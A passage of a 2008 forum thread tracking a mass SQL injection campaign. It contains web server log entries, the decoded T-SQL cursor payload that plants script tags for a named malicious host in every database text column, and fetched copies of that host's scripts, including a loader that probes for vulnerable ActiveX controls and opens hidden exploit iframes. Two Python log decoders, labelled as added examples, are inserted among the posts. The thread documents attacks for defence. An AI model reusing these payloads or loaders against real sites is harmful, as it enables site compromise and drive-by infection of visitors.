var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";


Code: [Select]
--11:55:32--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 122.224.146.36
Connecting to js.users.51.la[122.224.146.36]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');


Code: [Select]
--11:58:01--  http://www.cnzz.com/stat/website.php?web_id=1019605
           => `website.php?web_id=1019605'
Resolving www.cnzz.com... 127.0.0.1
Connecting to www.cnzz.com[127.0.0.1]:80... connected
HTTP request sent, awaiting response... 500

Comment: null-routed by DNS.


Code: [Select]
--11:59:17--  http://222.77.187.203/stat.htm?id=1019605
           => `stat.htm?id=1019605'
Connecting to 222.77.187.203:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
Power by Cnzz
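A defender-side decoder for the request shape in Orac's log entries and for the cursor script decoded at the top of this thread, added here as an example rather than code from the thread: it URL-decodes the line, matches the DECLARE/SET @S=CAST(0x...)/EXEC(@S) pattern, hex-decodes the body and pulls out the injected script src so the host can be blocked. The log line and its hex body are constructed (the thread's own hex is elided) with a placeholder host, and the NVARCHAR/UTF-16LE branch generalizes beyond the CHAR(4000) samples shown here.

```python
"""Decoder for the hex-encoded CAST(...);EXEC(@S) injection seen in this thread's log lines."""
import binascii
import re
from typing import Iterable, Iterator, Optional
from urllib.parse import unquote

# Request-line shape quoted in the thread, after %20 has been URL-decoded:
#   ';DECLARE @S CHAR(4000);SET @S=CAST(0x<hex> AS CHAR(4000));EXEC(@S);
# N?(?:VAR)?CHAR also admits the NCHAR/NVARCHAR form, which the thread's samples do not show.
INJECT_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)\s*;\s*"
    r"EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)
# The decoded cursor script appends '"></title><script src="..."></script><!--' to every text column.
SCRIPT_SRC_RE = re.compile(r'<script\s+src="([^"]+)"', re.IGNORECASE)

# Constructed sample: a copy of the cursor script decoded in this thread, with a
# placeholder host in place of the live domains the posts list.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>"
    "<script src=\"http://injected-host.invalid/csrss/w.js\"></script><!--'' "
    "where '+@C+' not like ''%\"></title>"
    "<script src=\"http://injected-host.invalid/csrss/w.js\"></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def build_sample_log_line(sql: str, wide: bool = False) -> str:
    """Constructed Apache-style log line in the shape Orac quoted; the hex body is
    generated from `sql` (UTF-16LE when wide=True, mimicking an NVARCHAR variant)."""
    body = sql.encode("utf-16-le" if wide else "latin-1")
    hexbody = binascii.hexlify(body).decode("ascii").upper()
    kind = "NVARCHAR(4000)" if wide else "CHAR(4000)"
    query = (f"/forums/index.php?showtopic=3063';DECLARE%20@S%20{kind};"
             f"SET%20@S=CAST(0x{hexbody}%20AS%20{kind});EXEC(@S);")
    return (f'xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET {query} HTTP/1.1" '
            '403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "-"')


def decode_hex_payload(hexstr: str) -> str:
    """Turn the 0x... body back into the T-SQL it carries.

    CHAR/VARCHAR bodies are single-byte text; an NVARCHAR body is UTF-16LE and
    shows up as a NUL in every other byte position."""
    if len(hexstr) % 2:
        hexstr = "0" + hexstr  # tolerate a stray leading nibble, as in one copy in this thread
    raw = binascii.unhexlify(hexstr)
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyse_log_line(line: str) -> Optional[dict]:
    """None for a line without the injection; otherwise the decoded SQL, the script
    URLs it inserts (block these at the proxy or DNS) and whether it is the
    sysobjects/syscolumns cursor variant seen in this thread."""
    match = INJECT_RE.search(unquote(line))
    if not match:
        return None
    sql = decode_hex_payload(match.group(2))
    lowered = sql.lower()
    return {
        "variable": "@" + match.group(1),
        "sql": sql,
        "script_urls": sorted(set(SCRIPT_SRC_RE.findall(sql))),
        "is_cursor_injection": "syscolumns" in lowered and "update [" in lowered,
    }


def scan_log(lines: Iterable[str]) -> Iterator[tuple]:
    """Yield (line_number, finding) for every injected request in a log."""
    for number, line in enumerate(lines, 1):
        finding = analyse_log_line(line)
        if finding:
            yield number, finding


if __name__ == "__main__":
    sample = [build_sample_log_line(SAMPLE_SQL),
              '1.2.3.4 - - [22/Aug/2008:03:09:01 +0000] "GET /forums/index.php?showtopic=3063 HTTP/1.1" 200 9120 "-" "Mozilla/4.0" "-"',
              build_sample_log_line(SAMPLE_SQL, wide=True)]
    for number, finding in scan_log(sample):
        print(f"line {number}: {finding['variable']} cursor={finding['is_cursor_injection']} "
              f"src={finding['script_urls']}")
```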
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 24, 2008, 10:12:03 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:05 am
Having problems posting this one; will have to split it up.

Sample Log entry
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:48:09--  http://www3.ss11qn.cn/csrss/w.js
           => `w.js'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}




Code: [Select]
--11:49:47--  http://www3.ss11qn.cn/csrss/new.htm
           => `new.htm'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s123.cnzz.com/stat.php?id=1055584&web_id=1055584" language="JavaScript" charset="gb2312"></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=ani.htm width=100 height=0></iframe>
<Iframe src=08053.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>
<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("NCTAudioFile2.AudioFile2.2"))window["document"]["write"]('<iframe style=display:none src=net.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src=xl.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2143797.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>



Code: [Select]
--11:53:40--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Code: [Select]
--11:58:56--  http://s123.cnzz.com/stat.php
           => `stat.php'
Resolving s123.cnzz.com... 219.232.243.4
Connecting to s123.cnzz.com[219.232.243.4]:80... connected
HTTP request sent, awaiting response... 200 OK

This loads a zero-byte page.


Code: [Select]
--12:00:13--  http://js.users.51.la/2143797.js
           => `2143797.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2143797" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');


Code: [Select]
--12:03:42--  http://www.51.la/?2143797
           => `?2143797'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK




Code: [Select]
--12:06:53--  http://js.users.51.la/5.js
           => `5.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1; VIP &#x7528;&#x6237;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a5tf="51la";var a5pu="";var a5pf="51la";var a5su=window.location;var a5sf=document.referrer;var a5of="";var a5op="";var a5ops=1;var a5ot=1;var a5d=new Date();var a5color="";if (navigator.appName=="Netscape"){a5color=screen.pixelDepth;} else {a5color=screen.colorDepth;}<\/script><script>a5tf=top.document.referrer;<\/script><script>a5pu =window.parent.location;<\/script><script>a5pf=window.parent.document.referrer;<\/script><script>a5ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a5ops=(a5ops==null)?1: (parseInt(unescape((a5ops)[2]))+1);var a5oe =new Date();a5oe.setTime(a5oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a5ops+ ";path=/;expires="+a5oe.toGMTString();a5ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a5ot==null){a5ot=1;}else{a5ot=parseInt(unescape((a5ot)[2])); a5ot=(a5ops==1)?(a5ot+1):(a5ot);}a5oe.setTime(a5oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a5ot+";path=/;expires="+a5oe.toGMTString();<\/script><script>a5of=a5sf;if(a5pf!=="51la"){a5of=a5pf;}if(a5tf!=="51la"){a5of=a5tf;}a5op=a5pu;try{lainframe}catch(e){a5op=a5su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=19&id=5&tpages=\'+a5ops+\'&ttimes=\'+a5ot+\'&tzone=\'+(0-a5d.getTimezoneOffset()/60)+\'&tcolor=\'+a5color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a5of)+\'&vpage=\'+escape(a5op)+\'" \/>\');<\/script>');


Code: [Select]
--12:03:42--  http://www.51.la/?5
           => `?5'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK


Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:51 am

Code: [Select]
--12:13:46--  http://bbs.51.la/forum-1-1.html
           => `forum-1-1.html'
Resolving bbs.51.la... 203.171.229.47
Connecting to bbs.51.la[203.171.229.47]:80... connected
HTTP request sent, awaiting response... 200 OK

This still won't post due to its size, so I've added it as an attachment.
Title: Re: SQL Injected jscript sites
Post by: JohnC on September 26, 2008, 06:39:03 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on October 11, 2008, 11:00:04 am
Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [10/Oct/2008:16:49:11 +0000] "GET /forum/viewtopic.php?f=11&t=28980';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" (malwareremoval.com) "-"

Decoded, note new file location.
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Looks as though the site is no longer available.
Quote
[www3.ss11qn.cn]
Error getting IP Address:
No such host is known.

Quote
Retrieving DNS records for www3.ss11qn.cn...

Attempt to get a DNS server for www3.ss11qn.cn failed: www3.ss11qn.cn does not exist in the DNS
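As an added example (not part of the thread), the following Python parses a web server log line shaped like the entries above, recovers the T-SQL from the CAST(0x...) hex literal, and pulls out the script URL the cursor payload plants in every text column; the log lines and the injected domain are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The hex-encoded T-SQL stub seen in the log entries above, after URL-decoding:
#   ';DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S);
INJECTION_RE = re.compile(
    r"DECLARE\s+@S\s+(?:N?VAR)?CHAR\(\d+\);\s*SET\s+@S\s*=\s*CAST\(0x([0-9A-Fa-f]+)"
    r"\s+AS\s+(?:N?VAR)?CHAR\(\d+\)\);\s*EXEC\(@S\)",
    re.IGNORECASE,
)
# The decoded payload writes <script src="..."> into every text column; capture the src.
SCRIPT_SRC_RE = re.compile(r"<script\s+src=[\"']?([^\"'>\s]+)", re.IGNORECASE)
# Request line of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_hex_payload(hexstr):
    """Turn the 0x... literal back into SQL. A CHAR(4000) payload is single-byte;
    an NVARCHAR variant would be UTF-16LE, which shows up as interleaved NUL bytes."""
    data = bytes.fromhex(hexstr)
    if b"\x00" in data:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("latin-1")


def analyze_log_line(line):
    """Return {'sql': ..., 'script_urls': [...]} for an injection attempt, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    inj = INJECTION_RE.search(unquote(m.group(1)))
    if not inj:
        return None
    sql = decode_hex_payload(inj.group(1))
    return {"sql": sql, "script_urls": sorted(set(SCRIPT_SRC_RE.findall(sql)))}


def summarize(lines):
    """Count injection attempts per injected script URL across a batch of log lines."""
    counts = Counter()
    for line in lines:
        hit = analyze_log_line(line)
        if hit:
            for url in hit["script_urls"]:
                counts[url] += 1
    return dict(counts)


# Constructed sample: the cursor payload decoded above, pointed at a placeholder
# domain, hex-encoded and wrapped in a log line shaped like the ones in this thread.
INJECTED_URL = "http://injected.example.invalid/csrss/w.js"
SCRIPT_TAG = '"></title><script src="' + INJECTED_URL + '"></script><!--'
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=''" + SCRIPT_TAG + "''+['+@C+'] "
    "where '+@C+' not like ''%" + SCRIPT_TAG + "''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_LOG_LINE = (
    'xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] '
    '"GET /forum/viewtopic.php?f=11&t=35291\';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x'
    + SAMPLE_SQL.encode("ascii").hex().upper()
    + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"'
)
BENIGN_LOG_LINE = (
    'xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:15 +0000] '
    '"GET /forum/viewtopic.php?f=11&t=35291 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"'
)

if __name__ == "__main__":
    for url, n in summarize([SAMPLE_LOG_LINE, SAMPLE_LOG_LINE, BENIGN_LOG_LINE]).items():
        print(f"{n} attempt(s) injecting {url}")
```

Feeding a night's access log through `summarize` gives the per-domain tally the thread reports by hand, and the decoded `sql` field shows the new file location without re-running anything.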
Title: Re: SQL Injected jscript sites
Post by: Orac on October 12, 2008, 01:39:55 pm
New site, we had a total of 44 different attempts involving this one in the overnight logs.

Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] "GET /forum/viewtopic.php?f=11&t=35291';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwareremoval.com) "-"

Decoded
Code: [Select]
